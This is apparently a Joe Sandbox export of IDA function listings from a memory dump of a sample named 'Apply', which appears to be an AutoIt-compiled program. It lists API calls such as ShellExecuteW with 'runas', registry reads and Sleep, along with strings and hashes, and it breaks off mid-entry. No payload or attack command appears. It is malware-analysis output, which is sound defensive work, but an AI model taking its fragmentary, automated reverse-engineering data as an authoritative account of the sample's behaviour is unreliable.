Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 39a723e31f904f5bdfbcb8436c167253f7b4b263da9ec12039f5ac2603a97d60
Instruction ID: 851504aa703ca4bda9a0dbe096fd64d16a6bb1c64351fd3775f382a5cc0f601b
Opcode Fuzzy Hash: 39a723e31f904f5bdfbcb8436c167253f7b4b263da9ec12039f5ac2603a97d60
Instruction Fuzzy Hash: EE216235600214AFDB04EF69C899E5A77F5FF58341B04806DE85AD7351DB30AD44CB50

Function 00855033 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008942BC

Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00855123

Strings

AutoIt - , xrefs: 00855097
Line %d: , xrefs: 0089433A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: 09f7c8c03cfd25a723a4ba0e70bfba6379d06ad76479bd5ce713890d2c96cddc
Instruction ID: 82cdeacd934d907b903a390966b8bf22bcf40659380f57bc68d6a011a4b0edb5
Opcode Fuzzy Hash: 09f7c8c03cfd25a723a4ba0e70bfba6379d06ad76479bd5ce713890d2c96cddc
Instruction Fuzzy Hash: 6841A171408704AAC721EB64DC91EDF7BD8FF94725F144A1AF888D2191EB349A4E8793

Function 00892F58 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00852853

Part of subcall function 00853DD1: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00892A98,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00853DEF

Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE

GetForegroundWindow.USER32(runas,?,?,?,?,?,00913204), ref: 00892FC3
ShellExecuteW.SHELL32(00000000,?,?,00913204), ref: 00892FCA

Strings

runas, xrefs: 00892FBE

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: d3484d12a974a4c12940daf423f8656649aeca0538982a8aa0028ddbadb6a2a2
Instruction ID: cc67cb48c064c90f25ae4d0a0eed7902ca8e35e532cdfce2f829f8536b0f76eb
Opcode Fuzzy Hash: d3484d12a974a4c12940daf423f8656649aeca0538982a8aa0028ddbadb6a2a2
Instruction Fuzzy Hash: 5111B4316083446BCB14FB68E8919AEBBA4FFD171AF40052DBD42D60A2DE35498DD793

Function 00854674 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00854667,SwapMouseButtons,00000004,?), ref: 00854698
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00854667,SwapMouseButtons,00000004,?), ref: 008546B9
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00854667,SwapMouseButtons,00000004,?), ref: 008546DB

Strings

Control Panel\Mouse, xrefs: 00854696

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: da6d652ed86f1e29aa95009cdc77bfab9fc9ad31cdc2cfd77c98bf016e1de284
Instruction ID: ecd1345804c1ccd3e07821c0b1f7a567c9bf7c064427d2967cb84c9ad5243bc8
Opcode Fuzzy Hash: da6d652ed86f1e29aa95009cdc77bfab9fc9ad31cdc2cfd77c98bf016e1de284
Instruction Fuzzy Hash: B0115A75511218FFEB208F68CC84EEF7BF8FF11749B105459B801D7110D2719E98AB60

Function 0085E570 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 008A384D

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 969cacfd03690b6d0fb9aba09755befd2a7b7f447ec855c8b56365cc30e51dea
Instruction ID: 8dd4f6b037584465efa7753cf0f1cd8c346667e76bc42073b067c3cf1627a4ad
Opcode Fuzzy Hash: 969cacfd03690b6d0fb9aba09755befd2a7b7f447ec855c8b56365cc30e51dea
Instruction Fuzzy Hash: 77C2A771E00218CFDB28CF58C880AADB7B1FF19315F648169E909EB291D774EE45CB91

Function 0086F7BC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0086F7CD
GlobalMemoryStatusEx.KERNEL32(?), ref: 0086F7E6

Strings

@, xrefs: 0086F7DA

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 467f6afc8cfb1737b9996f0de6501ae80c9fd0ba88693d46e2696d74637d2846
Instruction ID: 36630ca755e04441b2d74ecabe16ea90b5d6a05f934c73c51c423f57a5226ba0
Opcode Fuzzy Hash: 467f6afc8cfb1737b9996f0de6501ae80c9fd0ba88693d46e2696d74637d2846
Instruction Fuzzy Hash: 30515B724187449BD320AF18E885BAFBBF8FB84315F81885DF5D881192EB31946CC727

Function 0087012B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 008709B8

Part of subcall function 008735F4: RaiseException.KERNEL32(?,?,?,008709DA,?,00000000,?,?,?,?,?,?,008709DA,00000000,00919728,00000000), ref: 00873654

__CxxThrowException@8.LIBVCRUNTIME ref: 008709D5

Strings

Unknown exception, xrefs: 008709E2

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: c2e244d2a76f8f8d6469f3c0a9a1502019cf9d0ce642ec951bb4b82a60e3f528
Instruction ID: 24833101a1b56f1344084cc2d1154bccfb6f3f17e038c287b409bb92a386cf8c
Opcode Fuzzy Hash: c2e244d2a76f8f8d6469f3c0a9a1502019cf9d0ce642ec951bb4b82a60e3f528
Instruction Fuzzy Hash: 0DF0443490020DE78B00BAA8D856A9DBB6CFA00354B90C160BA1CD54EAEB71DA55D992

Function 008D86E0 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 008D8A7C
TerminateProcess.KERNEL32(00000000), ref: 008D8A83
FreeLibrary.KERNEL32(?,?,?,?), ref: 008D8C64

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: c07879a0c2c180f95ced5bd55d687fa7e37b28db1203d8533e5fcbb98d9176f9
Instruction ID: 595b592f2cd4daadb4f29a6d27edf4f4085d4c087ab5165248e06305475fc5d2
Opcode Fuzzy Hash: c07879a0c2c180f95ced5bd55d687fa7e37b28db1203d8533e5fcbb98d9176f9
Instruction Fuzzy Hash: 98124A71908341DFC714DF28C485A6ABBE5FF85328F148A5EE889CB352DB31E945CB92

Function 008D981D Relevance: 4.7, APIs: 3, Instructions: 233COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008D98B1
_strcat.LIBCMT ref: 008D98F0
_wcslen.LIBCMT ref: 008D993E

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _wcslen$_strcat
String ID:
API String ID: 306214811-0
Opcode ID: 3a7425d39ba391d8b384787b7627013b035602d4eff73b072cbd545b3e3ff989
Instruction ID: fe3b7279fa2d50b49dcfecbd6c86b29c8a90fbc09d0165a7e3e243471e58aa46
Opcode Fuzzy Hash: 3a7425d39ba391d8b384787b7627013b035602d4eff73b072cbd545b3e3ff989
Instruction Fuzzy Hash: 47A17A31604619EFCB18DF18C591969BBA1FF45318B2081AEE84ADF392DB31ED46CF81

Function 00852C6F Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00852A8D: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00852ABE
Part of subcall function 00852A8D: MapVirtualKeyW.USER32(00000010,00000000), ref: 00852AC6
Part of subcall function 00852A8D: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00852AD1
Part of subcall function 00852A8D: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00852ADC
Part of subcall function 00852A8D: MapVirtualKeyW.USER32(00000011,00000000), ref: 00852AE4
Part of subcall function 00852A8D: MapVirtualKeyW.USER32(00000012,00000000), ref: 00852AEC

Part of subcall function 00852AF5: RegisterWindowMessageW.USER32(00000004,?,00852E40), ref: 00852B4D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00852EE6
OleInitialize.OLE32 ref: 00852F04
CloseHandle.KERNEL32(00000000,00000000), ref: 00893018

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 8f867583d85e405f21954c28c4af865c2ffde3888a5579e1cd8daf14e72c05a3
Instruction ID: 22edfd454c44498c2143a775e575e589c4809ffceebc1f63ffed53b79ab7215e
Opcode Fuzzy Hash: 8f867583d85e405f21954c28c4af865c2ffde3888a5579e1cd8daf14e72c05a3
Instruction Fuzzy Hash: 1671B4B0929340AFC7A8EF7DAD65A143BE0FB49305340822EE508CB275EB34854AEF51

Function 00881EA0 Relevance: 4.6, APIs: 3, Instructions: 115COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00881F58
_free.LIBCMT ref: 00881F74
_free.LIBCMT ref: 00881F7E

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 30a689ff0f6c6c2f7fa6ae80a0ed2de04e6395842d56e492d41415f56c10a2a8
Instruction ID: a9a4b10ef70d439632d1d6ec129738a6cd31a8d040644950f7210bcbe32eae8b
Opcode Fuzzy Hash: 30a689ff0f6c6c2f7fa6ae80a0ed2de04e6395842d56e492d41415f56c10a2a8
Instruction Fuzzy Hash: 123104369002259BCF24BB6898859BAB7ACFF44760B644559FE05DB640EF31AE438390

Function 00855BA7 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000001,?,00000000), ref: 00855C4E
SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 00855C5E

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 2730e45488588a7133ca806e6e516ba77b2c4565188c15cfa19cd5de09119485
Instruction ID: 0a762891619e4ae1a03a826cf327215661eebde2129fac63c6ddc8abfd2a72ee
Opcode Fuzzy Hash: 2730e45488588a7133ca806e6e516ba77b2c4565188c15cfa19cd5de09119485
Instruction Fuzzy Hash: 8C316A31A00A0AEFDB14CF28C890B99B7B4FB44715F14862AED14E7640C7B1FE98CB91

Function 0086FC73 Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00855033: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00855123

KillTimer.USER32(?,00000001,?,?), ref: 0086FCFC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0086FD0B
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008AFBCA

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 7faef4c7b89cbe207bb1ea3fd8be1a0a5f6499b69410ffcb531c42426fe9ac33
Instruction ID: 038ad72852163e661c4d8078fbe4301a54bad635e51a34bf0adf561188ca4fd9
Opcode Fuzzy Hash: 7faef4c7b89cbe207bb1ea3fd8be1a0a5f6499b69410ffcb531c42426fe9ac33
Instruction Fuzzy Hash: 3831B670904354AFEB32CF64C895BE6BBFCFB06718F14049AD68AD7242C3745A86CB11

Function 008889FE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0088891C,?,00919CB8,0000000C), ref: 00888A54
GetLastError.KERNEL32(?,0088891C,?,00919CB8,0000000C), ref: 00888A5E
__dosmaperr.LIBCMT ref: 00888A89

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: d9b5e8f08751d9e0373584db932bef3c3245f9e4e9bd4973ebccf5848cb226c4
Instruction ID: f446fd4073bd36927266f70b0c1d550fef1d22ac93488ebecc4699ec3fd06d26
Opcode Fuzzy Hash: d9b5e8f08751d9e0373584db932bef3c3245f9e4e9bd4973ebccf5848cb226c4
Instruction Fuzzy Hash: 7C012B37665270DAC62872389C8577E674AFB81B34F69011AF825DB1C2DF309C8183A3

Function 008896DB Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,00894667,?,00000000,00000000,?,0088978A,?,?,00000002,00000000), ref: 00889714
GetLastError.KERNEL32(?,0088978A,?,?,00000002,00000000,?,00885EB1,?,00000000,00000000,00000002,?,?,?), ref: 0088971E
__dosmaperr.LIBCMT ref: 00889725

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: a76cbf33b08cd19909c3fabe3d0ec041dafc8a1733b62a70db8e6863e172c9a1
Instruction ID: 8f0631eebfa7746fe27d759397f4186c34796e945284765f1bcef7adffcbe16b
Opcode Fuzzy Hash: a76cbf33b08cd19909c3fabe3d0ec041dafc8a1733b62a70db8e6863e172c9a1
Instruction Fuzzy Hash: 03014733630118ABCB05BF99DC45CBE7B2AFB85330B280249F851DB290EA70DD11CBA1

Function 0085E0D8 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 0085E11B
DispatchMessageW.USER32(?), ref: 0085E129
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0085E13F
Sleep.KERNEL32(0000000A), ref: 0085E151
TranslateAcceleratorW.USER32(?,?,?), ref: 008A225F

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 95af0250cf7aabba1e8b08d384953344f955af7870cf3e9c8ead4ba34d4962d1
Instruction ID: 19b552731430be5666354c204b2b30189b3ed7ccccc0215a2ce9952e81ff3fce
Opcode Fuzzy Hash: 95af0250cf7aabba1e8b08d384953344f955af7870cf3e9c8ead4ba34d4962d1
Instruction Fuzzy Hash: 5CF05830604381ABEB348BA09C89FDA73A8FB84305F504928EA19D70C0EB70E48CDB12

Function 008619C0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00861EA6

Strings

CALL, xrefs: 00861E76

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 440de3e178cf3d5b2da825e145a330022273852a301baffd5df233f935b51543
Instruction ID: ed19360a5780f4e5decab27b57b9a32998e9c77d7180edcaded7a17b854f0ebf
Opcode Fuzzy Hash: 440de3e178cf3d5b2da825e145a330022273852a301baffd5df233f935b51543
Instruction Fuzzy Hash: 88228A70608201DFDB14DF18C488A2ABBF1FF85354F19891DF89ACB262E771E955CB92

Function 008531C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00893391

Part of subcall function 00853FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00853E0E,?,?,00892A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 00854017

Part of subcall function 0085318A: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 008531A9

Strings

X, xrefs: 0089335F

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: c1d31ad33ebefae4f99b792a82caa7459928145244df85af91068eafbe0cb99d
Instruction ID: e91c87e1aa835ae727af97246a8ea30d0fe5fd90117a5624a1ba0c573cc2fc81
Opcode Fuzzy Hash: c1d31ad33ebefae4f99b792a82caa7459928145244df85af91068eafbe0cb99d
Instruction Fuzzy Hash: F8216271A04248ABDF119F98D845BDEBBF9EF48315F044019E809E7241DBB45A8D8F61

Function 00859E60 Relevance: 3.2, APIs: 2, Instructions: 236fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000000,00010000,?,00000000,00000002,?,00000001,?,?,00859DE6,?,?,?), ref: 00859FAC
